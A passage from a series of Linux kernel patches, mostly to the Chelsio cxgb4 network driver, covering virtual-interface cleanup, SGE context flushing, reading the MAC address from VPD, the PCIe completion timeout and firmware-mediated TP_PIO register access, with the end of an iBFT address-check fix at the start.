0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0xff, 0xff, + 0x00, 0x00, 0x00, 0x00 }; + +static int address_not_null(u8 *ip) +{ + return (memcmp(ip, nulls, 16) && memcmp(ip, mapped_nulls, 16)); +} + /* * Helper functions to parse data properly. */ @@ -445,7 +457,7 @@ static umode_t ibft_check_nic_for(void *data, int type) rc = S_IRUGO; break; case ISCSI_BOOT_ETH_IP_ADDR: - if (memcmp(nic->ip_addr, nulls, sizeof(nic->ip_addr))) + if (address_not_null(nic->ip_addr)) rc = S_IRUGO; break; case ISCSI_BOOT_ETH_SUBNET_MASK: @@ -456,21 +468,19 @@ static umode_t ibft_check_nic_for(void *data, int type) rc = S_IRUGO; break; case ISCSI_BOOT_ETH_GATEWAY: - if (memcmp(nic->gateway, nulls, sizeof(nic->gateway))) + if (address_not_null(nic->gateway)) rc = S_IRUGO; break; case ISCSI_BOOT_ETH_PRIMARY_DNS: - if (memcmp(nic->primary_dns, nulls, - sizeof(nic->primary_dns))) + if (address_not_null(nic->primary_dns)) rc = S_IRUGO; break; case ISCSI_BOOT_ETH_SECONDARY_DNS: - if (memcmp(nic->secondary_dns, nulls, - sizeof(nic->secondary_dns))) + if (address_not_null(nic->secondary_dns)) rc = S_IRUGO; break; case ISCSI_BOOT_ETH_DHCP: - if (memcmp(nic->dhcp, nulls, sizeof(nic->dhcp))) + if (address_not_null(nic->dhcp)) rc = S_IRUGO; break; case ISCSI_BOOT_ETH_VLAN: @@ -536,23 +546,19 @@ static umode_t __init ibft_check_initiator_for(void *data, int type) rc = S_IRUGO; break; case ISCSI_BOOT_INI_ISNS_SERVER: - if (memcmp(init->isns_server, nulls, - sizeof(init->isns_server))) + if (address_not_null(init->isns_server)) rc = S_IRUGO; break; case ISCSI_BOOT_INI_SLP_SERVER: - if (memcmp(init->slp_server, nulls, - sizeof(init->slp_server))) + if (address_not_null(init->slp_server)) rc = S_IRUGO; break; case ISCSI_BOOT_INI_PRI_RADIUS_SERVER: - if (memcmp(init->pri_radius_server, nulls, - sizeof(init->pri_radius_server))) + if (address_not_null(init->pri_radius_server)) rc = S_IRUGO; break; case ISCSI_BOOT_INI_SEC_RADIUS_SERVER: - if (memcmp(init->sec_radius_server, nulls, - sizeof(init->sec_radius_server))) + if (address_not_null(init->sec_radius_server)) rc = S_IRUGO; break; case ISCSI_BOOT_INI_INITIATOR_NAME: From 4f3a0fcfb64b107bfbec0779a02438b321cc5dcf Mon Sep 17 00:00:00 2001 From: Hariprasad Shenai Date: Fri, 5 Jun 2015 14:24:47 +0530 Subject: [PATCH 729/872] cxgb4: Free Virtual Interfaces in remove routine Free VI interfaces in remove routine. If we don't do this then the firmware will never drop the physical link to the peer. Signed-off-by: Hariprasad Shenai Signed-off-by: David S. Miller --- drivers/net/ethernet/chelsio/cxgb4/cxgb4.h | 3 +++ .../net/ethernet/chelsio/cxgb4/cxgb4_main.c | 5 ++++ drivers/net/ethernet/chelsio/cxgb4/t4_hw.c | 27 +++++++++++++++++++ 3 files changed, 35 insertions(+) diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h index bf2b822d0e8e..93e6cbc3b4a8 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h @@ -1378,6 +1378,9 @@ int t4_cfg_pfvf(struct adapter *adap, unsigned int mbox, unsigned int pf, int t4_alloc_vi(struct adapter *adap, unsigned int mbox, unsigned int port, unsigned int pf, unsigned int vf, unsigned int nmac, u8 *mac, unsigned int *rss_size); +int t4_free_vi(struct adapter *adap, unsigned int mbox, + unsigned int pf, unsigned int vf, + unsigned int viid); int t4_set_rxmode(struct adapter *adap, unsigned int mbox, unsigned int viid, int mtu, int promisc, int all_multi, int bcast, int vlanex, bool sleep_ok); diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c index 305715484004..e6abdb7cdcae 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c @@ -4538,6 +4538,11 @@ static void free_some_resources(struct adapter *adapter) for_each_port(adapter, i) if (adapter->port[i]) { + struct port_info *pi = adap2pinfo(adapter, i); + + if (pi->viid != 0) + t4_free_vi(adapter, adapter->mbox, adapter->pf, + 0, pi->viid); kfree(adap2pinfo(adapter, i)->rss); free_netdev(adapter->port[i]); } diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c index c21ab2686a69..3a56254f27a8 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c +++ b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c @@ -5225,6 +5225,33 @@ int t4_alloc_vi(struct adapter *adap, unsigned int mbox, unsigned int port, return FW_VI_CMD_VIID_G(be16_to_cpu(c.type_viid)); } +/** + * t4_free_vi - free a virtual interface + * @adap: the adapter + * @mbox: mailbox to use for the FW command + * @pf: the PF owning the VI + * @vf: the VF owning the VI + * @viid: virtual interface identifiler + * + * Free a previously allocated virtual interface. + */ +int t4_free_vi(struct adapter *adap, unsigned int mbox, unsigned int pf, + unsigned int vf, unsigned int viid) +{ + struct fw_vi_cmd c; + + memset(&c, 0, sizeof(c)); + c.op_to_vfn = cpu_to_be32(FW_CMD_OP_V(FW_VI_CMD) | + FW_CMD_REQUEST_F | + FW_CMD_EXEC_F | + FW_VI_CMD_PFN_V(pf) | + FW_VI_CMD_VFN_V(vf)); + c.alloc_to_len16 = cpu_to_be32(FW_VI_CMD_FREE_F | FW_LEN16(c)); + c.type_viid = cpu_to_be16(FW_VI_CMD_VIID_V(viid)); + + return t4_wr_mbox(adap, mbox, &c, sizeof(c), &c); +} + /** * t4_set_rxmode - set Rx properties of a virtual interface * @adap: the adapter From 5d700ecb06275af22b3db6559eb5b3d7a8e6bf70 Mon Sep 17 00:00:00 2001 From: Hariprasad Shenai Date: Fri, 5 Jun 2015 14:24:48 +0530 Subject: [PATCH 730/872] cxgb4: Add sge ec context flush service Add function to flush the sge ec context cache, and utilize this new function in the driver Signed-off-by: Hariprasad Shenai Signed-off-by: David S. Miller --- drivers/net/ethernet/chelsio/cxgb4/cxgb4.h | 1 + .../net/ethernet/chelsio/cxgb4/cxgb4_main.c | 5 +--- drivers/net/ethernet/chelsio/cxgb4/t4_hw.c | 26 +++++++++++++++++++ drivers/net/ethernet/chelsio/cxgb4/t4fw_api.h | 6 ++++- 4 files changed, 33 insertions(+), 5 deletions(-) diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h index 93e6cbc3b4a8..1043d7ae31e1 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h @@ -1410,6 +1410,7 @@ int t4_ctrl_eq_free(struct adapter *adap, unsigned int mbox, unsigned int pf, unsigned int vf, unsigned int eqid); int t4_ofld_eq_free(struct adapter *adap, unsigned int mbox, unsigned int pf, unsigned int vf, unsigned int eqid); +int t4_sge_ctxt_flush(struct adapter *adap, unsigned int mbox); int t4_handle_fw_rpl(struct adapter *adap, const __be64 *rpl); void t4_db_full(struct adapter *adapter); void t4_db_dropped(struct adapter *adapter); diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c index e6abdb7cdcae..3ca7e247414f 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c @@ -2007,11 +2007,8 @@ EXPORT_SYMBOL(cxgb4_iscsi_init); int cxgb4_flush_eq_cache(struct net_device *dev) { struct adapter *adap = netdev2adap(dev); - int ret; - ret = t4_fwaddrspace_write(adap, adap->mbox, - 0xe1000000 + SGE_CTXT_CMD_A, 0x20000000); - return ret; + return t4_sge_ctxt_flush(adap, adap->mbox); } EXPORT_SYMBOL(cxgb4_flush_eq_cache); diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c index 3a56254f27a8..e24f650d719a 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c +++ b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c @@ -4529,6 +4529,32 @@ void t4_sge_decode_idma_state(struct adapter *adapter, int state) sge_regs[i], t4_read_reg(adapter, sge_regs[i])); } +/** + * t4_sge_ctxt_flush - flush the SGE context cache + * @adap: the adapter + * @mbox: mailbox to use for the FW command + * + * Issues a FW command through the given mailbox to flush the + * SGE context cache. + */ +int t4_sge_ctxt_flush(struct adapter *adap, unsigned int mbox) +{ + int ret; + u32 ldst_addrspace; + struct fw_ldst_cmd c; + + memset(&c, 0, sizeof(c)); + ldst_addrspace = FW_LDST_CMD_ADDRSPACE_V(FW_LDST_ADDRSPC_SGE_EGRC); + c.op_to_addrspace = cpu_to_be32(FW_CMD_OP_V(FW_LDST_CMD) | + FW_CMD_REQUEST_F | FW_CMD_READ_F | + ldst_addrspace); + c.cycles_to_len16 = cpu_to_be32(FW_LEN16(c)); + c.u.idctxt.msg_ctxtflush = cpu_to_be32(FW_LDST_CMD_CTXTFLUSH_F); + + ret = t4_wr_mbox(adap, mbox, &c, sizeof(c), &c); + return ret; +} + /** * t4_fw_hello - establish communication with FW * @adap: the adapter diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4fw_api.h b/drivers/net/ethernet/chelsio/cxgb4/t4fw_api.h index aceb1e8cacc8..ab4674684acc 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4fw_api.h +++ b/drivers/net/ethernet/chelsio/cxgb4/t4fw_api.h @@ -772,7 +772,7 @@ struct fw_ldst_cmd { } addrval; struct fw_ldst_idctxt { __be32 physid; - __be32 msg_pkd; + __be32 msg_ctxtflush; __be32 ctxt_data7; __be32 ctxt_data6; __be32 ctxt_data5; @@ -834,6 +834,10 @@ struct fw_ldst_cmd { #define FW_LDST_CMD_MSG_S 31 #define FW_LDST_CMD_MSG_V(x) ((x) << FW_LDST_CMD_MSG_S) +#define FW_LDST_CMD_CTXTFLUSH_S 30 +#define FW_LDST_CMD_CTXTFLUSH_V(x) ((x) << FW_LDST_CMD_CTXTFLUSH_S) +#define FW_LDST_CMD_CTXTFLUSH_F FW_LDST_CMD_CTXTFLUSH_V(1U) + #define FW_LDST_CMD_PADDR_S 8 #define FW_LDST_CMD_PADDR_V(x) ((x) << FW_LDST_CMD_PADDR_S) From 4036da9012019f2214be3bc3598a8234953e035f Mon Sep 17 00:00:00 2001 From: Hariprasad Shenai Date: Fri, 5 Jun 2015 14:24:49 +0530 Subject: [PATCH 731/872] cxgb4: Rename t4_link_start() to t4_link_l1cfg t4_link_start() was completely misnamed. It does _not_ start up the link. It merely does the L1 Configuration for the link. The Link Up process is started automatically by the firmware when the number of enabled Virtual Interfaces on a port goes from 0 to 1. So renaming this routine to t4_link_l1cfg() for better documentation. Signed-off-by: Hariprasad Shenai Signed-off-by: David S. Miller --- drivers/net/ethernet/chelsio/cxgb4/cxgb4.h | 2 +- drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c | 4 ++-- drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c | 2 +- drivers/net/ethernet/chelsio/cxgb4/t4_hw.c | 4 ++-- 4 files changed, 6 insertions(+), 6 deletions(-) diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h index 1043d7ae31e1..4ab5a2dcde9e 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h @@ -1229,7 +1229,7 @@ void t4_intr_disable(struct adapter *adapter); int t4_slow_intr_handler(struct adapter *adapter); int t4_wait_dev_ready(void __iomem *regs); -int t4_link_start(struct adapter *adap, unsigned int mbox, unsigned int port, +int t4_link_l1cfg(struct adapter *adap, unsigned int mbox, unsigned int port, struct link_config *lc); int t4_restart_aneg(struct adapter *adap, unsigned int mbox, unsigned int port); diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c index 0194c91a0486..687acf71fa15 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c @@ -646,7 +646,7 @@ static int set_settings(struct net_device *dev, struct ethtool_cmd *cmd) lc->autoneg = cmd->autoneg; if (netif_running(dev)) - return t4_link_start(p->adapter, p->adapter->pf, p->tx_chan, + return t4_link_l1cfg(p->adapter, p->adapter->pf, p->tx_chan, lc); return 0; } @@ -679,7 +679,7 @@ static int set_pauseparam(struct net_device *dev, if (epause->tx_pause) lc->requested_fc |= PAUSE_TX; if (netif_running(dev)) - return t4_link_start(p->adapter, p->adapter->pf, p->tx_chan, + return t4_link_l1cfg(p->adapter, p->adapter->pf, p->tx_chan, lc); return 0; } diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c index 3ca7e247414f..4cb7eed93b5e 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c @@ -481,7 +481,7 @@ static int link_start(struct net_device *dev) } } if (ret == 0) - ret = t4_link_start(pi->adapter, mb, pi->tx_chan, + ret = t4_link_l1cfg(pi->adapter, mb, pi->tx_chan, &pi->link_cfg); if (ret == 0) { local_bh_disable(); diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c index e24f650d719a..6d5b0f4be75b 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c +++ b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c @@ -2579,7 +2579,7 @@ void t4_ulprx_read_la(struct adapter *adap, u32 *la_buf) FW_PORT_CAP_ANEG) /** - * t4_link_start - apply link configuration to MAC/PHY + * t4_link_l1cfg - apply link configuration to MAC/PHY * @phy: the PHY to setup * @mac: the MAC to setup * @lc: the requested link configuration @@ -2591,7 +2591,7 @@ void t4_ulprx_read_la(struct adapter *adap, u32 *la_buf) * - If auto-negotiation is off set the MAC to the proper speed/duplex/FC, * otherwise do it later based on the outcome of auto-negotiation. */ -int t4_link_start(struct adapter *adap, unsigned int mbox, unsigned int port, +int t4_link_l1cfg(struct adapter *adap, unsigned int mbox, unsigned int port, struct link_config *lc) { struct fw_port_cmd c; From 098ef6c28a956ba05c31fb9fbf8bad56165ed415 Mon Sep 17 00:00:00 2001 From: Hariprasad Shenai Date: Fri, 5 Jun 2015 14:24:50 +0530 Subject: [PATCH 732/872] cxgb4: Set mac addr from vpd, when we can't contact firmware Grab the Adapter MAC Address out of the VPD and use it for the "debug" network interface when either we can't contact the firmware Signed-off-by: Hariprasad Shenai Signed-off-by: David S. Miller --- drivers/net/ethernet/chelsio/cxgb4/cxgb4.h | 32 ++++++++++--- .../net/ethernet/chelsio/cxgb4/cxgb4_main.c | 21 +++++++-- drivers/net/ethernet/chelsio/cxgb4/t4_hw.c | 47 +++++++++++++++---- 3 files changed, 81 insertions(+), 19 deletions(-) diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h index 4ab5a2dcde9e..4d627a8f04b0 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h @@ -46,17 +46,19 @@ #include #include #include +#include #include #include "cxgb4_uld.h" #define CH_WARN(adap, fmt, ...) dev_warn(adap->pdev_dev, fmt, ## __VA_ARGS__) enum { - MAX_NPORTS = 4, /* max # of ports */ - SERNUM_LEN = 24, /* Serial # length */ - EC_LEN = 16, /* E/C length */ - ID_LEN = 16, /* ID length */ - PN_LEN = 16, /* Part Number length */ + MAX_NPORTS = 4, /* max # of ports */ + SERNUM_LEN = 24, /* Serial # length */ + EC_LEN = 16, /* E/C length */ + ID_LEN = 16, /* ID length */ + PN_LEN = 16, /* Part Number length */ + MACADDR_LEN = 12, /* MAC Address length */ }; enum { @@ -280,6 +282,7 @@ struct vpd_params { u8 sn[SERNUM_LEN + 1]; u8 id[ID_LEN + 1]; u8 pn[PN_LEN + 1]; + u8 na[MACADDR_LEN + 1]; }; struct pci_params { @@ -945,6 +948,22 @@ static inline void t4_write_reg64(struct adapter *adap, u32 reg_addr, u64 val) writeq(val, adap->regs + reg_addr); } +/** + * t4_set_hw_addr - store a port's MAC address in SW + * @adapter: the adapter + * @port_idx: the port index + * @hw_addr: the Ethernet address + * + * Store the Ethernet address of the given port in SW. Called by the common + * code when it retrieves a port's Ethernet address from EEPROM. + */ +static inline void t4_set_hw_addr(struct adapter *adapter, int port_idx, + u8 hw_addr[]) +{ + ether_addr_copy(adapter->port[port_idx]->dev_addr, hw_addr); + ether_addr_copy(adapter->port[port_idx]->perm_addr, hw_addr); +} + /** * netdev2pinfo - return the port_info structure associated with a net_device * @dev: the netdev @@ -1251,7 +1270,8 @@ unsigned int t4_get_regs_len(struct adapter *adapter); void t4_get_regs(struct adapter *adap, void *buf, size_t buf_size); int t4_seeprom_wp(struct adapter *adapter, bool enable); -int get_vpd_params(struct adapter *adapter, struct vpd_params *p); +int t4_get_raw_vpd_params(struct adapter *adapter, struct vpd_params *p); +int t4_get_vpd_params(struct adapter *adapter, struct vpd_params *p); int t4_read_flash(struct adapter *adapter, unsigned int addr, unsigned int nwords, u32 *data, int byte_oriented); int t4_load_fw(struct adapter *adapter, const u8 *fw_data, unsigned int size); diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c index 4cb7eed93b5e..3897e2834674 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c @@ -3712,7 +3712,7 @@ static int adap_init0(struct adapter *adap) * the firmware. On the other hand, we need these fairly early on * so we do this right after getting ahold of the firmware. */ - ret = get_vpd_params(adap, &adap->params.vpd); + ret = t4_get_vpd_params(adap, &adap->params.vpd); if (ret < 0) goto bye; @@ -4735,10 +4735,25 @@ static int init_one(struct pci_dev *pdev, const struct pci_device_id *ent) err = t4_port_init(adapter, func, func, 0); if (err) goto out_free_dev; + } else if (adapter->params.nports == 1) { + /* If we don't have a connection to the firmware -- possibly + * because of an error -- grab the raw VPD parameters so we + * can set the proper MAC Address on the debug network + * interface that we've created. + */ + u8 hw_addr[ETH_ALEN]; + u8 *na = adapter->params.vpd.na; + + err = t4_get_raw_vpd_params(adapter, &adapter->params.vpd); + if (!err) { + for (i = 0; i < ETH_ALEN; i++) + hw_addr[i] = (hex2val(na[2 * i + 0]) * 16 + + hex2val(na[2 * i + 1])); + t4_set_hw_addr(adapter, 0, hw_addr); + } } - /* - * Configure queues and allocate tables now, they can be needed as + /* Configure queues and allocate tables now, they can be needed as * soon as the first register_netdev completes. */ cfg_queues(adapter); diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c index 6d5b0f4be75b..da65e76c44b5 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c +++ b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c @@ -1729,17 +1729,16 @@ int t4_seeprom_wp(struct adapter *adapter, bool enable) } /** - * get_vpd_params - read VPD parameters from VPD EEPROM + * t4_get_raw_vpd_params - read VPD parameters from VPD EEPROM * @adapter: adapter to read * @p: where to store the parameters * * Reads card parameters stored in VPD EEPROM. */ -int get_vpd_params(struct adapter *adapter, struct vpd_params *p) +int t4_get_raw_vpd_params(struct adapter *adapter, struct vpd_params *p) { - u32 cclk_param, cclk_val; - int i, ret, addr; - int ec, sn, pn; + int i, ret = 0, addr; + int ec, sn, pn, na; u8 *vpd, csum; unsigned int vpdr_len, kw_offset, id_len; @@ -1747,6 +1746,9 @@ int get_vpd_params(struct adapter *adapter, struct vpd_params *p) if (!vpd) return -ENOMEM; + /* Card information normally starts at VPD_BASE but early cards had + * it at 0. + */ ret = pci_read_vpd(adapter->pdev, VPD_BASE, sizeof(u32), vpd); if (ret < 0) goto out; @@ -1812,6 +1814,7 @@ int get_vpd_params(struct adapter *adapter, struct vpd_params *p) FIND_VPD_KW(ec, "EC"); FIND_VPD_KW(sn, "SN"); FIND_VPD_KW(pn, "PN"); + FIND_VPD_KW(na, "NA"); #undef FIND_VPD_KW memcpy(p->id, vpd + PCI_VPD_LRDT_TAG_SIZE, id_len); @@ -1824,18 +1827,42 @@ int get_vpd_params(struct adapter *adapter, struct vpd_params *p) i = pci_vpd_info_field_size(vpd + pn - PCI_VPD_INFO_FLD_HDR_SIZE); memcpy(p->pn, vpd + pn, min(i, PN_LEN)); strim(p->pn); + memcpy(p->na, vpd + na, min(i, MACADDR_LEN)); + strim((char *)p->na); - /* - * Ask firmware for the Core Clock since it knows how to translate the +out: + vfree(vpd); + return ret; +} + +/** + * t4_get_vpd_params - read VPD parameters & retrieve Core Clock + * @adapter: adapter to read + * @p: where to store the parameters + * + * Reads card parameters stored in VPD EEPROM and retrieves the Core + * Clock. This can only be called after a connection to the firmware + * is established. + */ +int t4_get_vpd_params(struct adapter *adapter, struct vpd_params *p) +{ + u32 cclk_param, cclk_val; + int ret; + + /* Grab the raw VPD parameters. + */ + ret = t4_get_raw_vpd_params(adapter, p); + if (ret) + return ret; + + /* Ask firmware for the Core Clock since it knows how to translate the * Reference Clock ('V2') VPD field into a Core Clock value ... */ cclk_param = (FW_PARAMS_MNEM_V(FW_PARAMS_MNEM_DEV) | FW_PARAMS_PARAM_X_V(FW_PARAMS_PARAM_DEV_CCLK)); - ret = t4_query_params(adapter, adapter->mbox, 0, 0, + ret = t4_query_params(adapter, adapter->mbox, adapter->pf, 0, 1, &cclk_param, &cclk_val); -out: - vfree(vpd); if (ret) return ret; p->cclk = cclk_val; From eca0f6eeadec74027a4f940bd6958c41e5259618 Mon Sep 17 00:00:00 2001 From: Hariprasad Shenai Date: Fri, 5 Jun 2015 14:24:51 +0530 Subject: [PATCH 733/872] cxgb4: program pci completion timeout Set pci completion timeout to 0xd. Signed-off-by: Hariprasad Shenai Signed-off-by: David S. Miller --- drivers/net/ethernet/chelsio/cxgb4/t4_hw.c | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c index da65e76c44b5..efd0aa1a224e 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c +++ b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c @@ -5847,6 +5847,22 @@ static int get_flash_params(struct adapter *adap) return 0; } +static void set_pcie_completion_timeout(struct adapter *adapter, u8 range) +{ + u16 val; + u32 pcie_cap; + + pcie_cap = pci_find_capability(adapter->pdev, PCI_CAP_ID_EXP); + if (pcie_cap) { + pci_read_config_word(adapter->pdev, + pcie_cap + PCI_EXP_DEVCTL2, &val); + val &= ~PCI_EXP_DEVCTL2_COMP_TIMEOUT; + val |= range; + pci_write_config_word(adapter->pdev, + pcie_cap + PCI_EXP_DEVCTL2, val); + } +} + /** * t4_prep_adapter - prepare SW and HW for operation * @adapter: the adapter @@ -5919,6 +5935,9 @@ int t4_prep_adapter(struct adapter *adapter) adapter->params.nports = 1; adapter->params.portvec = 1; adapter->params.vpd.cclk = 50000; + + /* Set pci completion timeout value to 4 seconds. */ + set_pcie_completion_timeout(adapter, 0xd); return 0; } From c1e9af0ca1f8adb7f3badfc027fa42ecfcb34956 Mon Sep 17 00:00:00 2001 From: Hariprasad Shenai Date: Fri, 5 Jun 2015 14:24:52 +0530 Subject: [PATCH 734/872] cxgb4: Use FW LDST cmd to access TP_PIO_{ADDR, DATA} register first The TP_PIO_{ADDR,DATA} registers are are in conflict with the firmware's use of these registers. Added a routine to access it through FW LDST cmd. Access all TP_PIO_{ADDR,DATA} register access through new routine if FW is alive. If firmware is dead, than fall back to indirect access. Signed-off-by: Hariprasad Shenai Signed-off-by: David S. Miller --- .../net/ethernet/chelsio/cxgb4/cxgb4_main.c | 2 +- drivers/net/ethernet/chelsio/cxgb4/t4_hw.c | 102 ++++++++++++++---- 2 files changed, 83 insertions(+), 21 deletions(-) diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c index 3897e2834674..0e27f2266e6b 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c @@ -4068,8 +4068,8 @@ static int adap_init0(struct adapter *adap) adap->params.b_wnd); } t4_init_sge_params(adap); - t4_init_tp_params(adap); adap->flags |= FW_OK; + t4_init_tp_params(adap); return 0; /* diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c index efd0aa1a224e..b4110988536d 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c +++ b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c @@ -3632,6 +3632,40 @@ int t4_read_rss(struct adapter *adapter, u16 *map) return 0; } +/** + * t4_fw_tp_pio_rw - Access TP PIO through LDST + * @adap: the adapter + * @vals: where the indirect register values are stored/written + * @nregs: how many indirect registers to read/write + * @start_idx: index of first indirect register to read/write + * @rw: Read (1) or Write (0) + * + * Access TP PIO registers through LDST + */ +static void t4_fw_tp_pio_rw(struct adapter *adap, u32 *vals, unsigned int nregs, + unsigned int start_index, unsigned int rw) +{ + int ret, i; + int cmd = FW_LDST_ADDRSPC_TP_PIO; + struct fw_ldst_cmd c; + + for (i = 0 ; i < nregs; i++) { + memset(&c, 0, sizeof(c)); + c.op_to_addrspace = cpu_to_be32(FW_CMD_OP_V(FW_LDST_CMD) | + FW_CMD_REQUEST_F | + (rw ? FW_CMD_READ_F : + FW_CMD_WRITE_F) | + FW_LDST_CMD_ADDRSPACE_V(cmd)); + c.cycles_to_len16 = cpu_to_be32(FW_LEN16(c)); + + c.u.addrval.addr = cpu_to_be32(start_index + i); + c.u.addrval.val = rw ? 0 : cpu_to_be32(vals[i]); + ret = t4_wr_mbox(adap, adap->mbox, &c, sizeof(c), &c); + if (!ret && rw) + vals[i] = be32_to_cpu(c.u.addrval.val); + } +} + /** * t4_read_rss_key - read the global RSS key * @adap: the adapter @@ -3641,8 +3675,11 @@ int t4_read_rss(struct adapter *adapter, u16 *map) */ void t4_read_rss_key(struct adapter *adap, u32 *key) { - t4_read_indirect(adap, TP_PIO_ADDR_A, TP_PIO_DATA_A, key, 10, - TP_RSS_SECRET_KEY0_A); + if (adap->flags & FW_OK) + t4_fw_tp_pio_rw(adap, key, 10, TP_RSS_SECRET_KEY0_A, 1); + else + t4_read_indirect(adap, TP_PIO_ADDR_A, TP_PIO_DATA_A, key, 10, + TP_RSS_SECRET_KEY0_A); } /** @@ -3668,8 +3705,11 @@ void t4_write_rss_key(struct adapter *adap, const u32 *key, int idx) (vrt & KEYEXTEND_F) && (KEYMODE_G(vrt) == 3)) rss_key_addr_cnt = 32; - t4_write_indirect(adap, TP_PIO_ADDR_A, TP_PIO_DATA_A, key, 10, - TP_RSS_SECRET_KEY0_A); + if (adap->flags & FW_OK) + t4_fw_tp_pio_rw(adap, (void *)key, 10, TP_RSS_SECRET_KEY0_A, 0); + else + t4_write_indirect(adap, TP_PIO_ADDR_A, TP_PIO_DATA_A, key, 10, + TP_RSS_SECRET_KEY0_A); if (idx >= 0 && idx < rss_key_addr_cnt) { if (rss_key_addr_cnt > 16) @@ -3694,8 +3734,12 @@ void t4_write_rss_key(struct adapter *adap, const u32 *key, int idx) void t4_read_rss_pf_config(struct adapter *adapter, unsigned int index, u32 *valp) { - t4_read_indirect(adapter, TP_PIO_ADDR_A, TP_PIO_DATA_A, - valp, 1, TP_RSS_PF0_CONFIG_A + index); + if (adapter->flags & FW_OK) + t4_fw_tp_pio_rw(adapter, valp, 1, + TP_RSS_PF0_CONFIG_A + index, 1); + else + t4_read_indirect(adapter, TP_PIO_ADDR_A, TP_PIO_DATA_A, + valp, 1, TP_RSS_PF0_CONFIG_A + index); } /** @@ -3730,10 +3774,15 @@ void t4_read_rss_vf_config(struct adapter *adapter, unsigned int index, /* Grab the VFL/VFH values ... */ - t4_read_indirect(adapter, TP_PIO_ADDR_A, TP_PIO_DATA_A, - vfl, 1, TP_RSS_VFL_CONFIG_A); - t4_read_indirect(adapter, TP_PIO_ADDR_A, TP_PIO_DATA_A, - vfh, 1, TP_RSS_VFH_CONFIG_A); + if (adapter->flags & FW_OK) { + t4_fw_tp_pio_rw(adapter, vfl, 1, TP_RSS_VFL_CONFIG_A, 1); + t4_fw_tp_pio_rw(adapter, vfh, 1, TP_RSS_VFH_CONFIG_A, 1); + } else { + t4_read_indirect(adapter, TP_PIO_ADDR_A, TP_PIO_DATA_A, + vfl, 1, TP_RSS_VFL_CONFIG_A); + t4_read_indirect(adapter, TP_PIO_ADDR_A, TP_PIO_DATA_A, + vfh, 1, TP_RSS_VFH_CONFIG_A); + } } /** @@ -3746,8 +3795,11 @@ u32 